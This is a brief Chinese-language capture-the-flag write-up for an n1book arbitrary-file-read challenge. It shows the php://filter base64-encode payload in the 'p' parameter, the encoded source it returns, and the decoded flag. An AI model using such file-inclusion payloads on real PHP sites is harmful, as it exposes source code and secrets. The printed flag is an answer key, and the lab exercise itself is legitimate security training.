任意文件读取漏洞
发现了?p=hello,然后页面回显了hello world
因为提示了是文件读取漏洞
没有回显
因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀
php的filter读取一下
?p=php://filter/read=convert.base64-encode/resource=flag
PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
base64解码
n1book{afr_1_solved}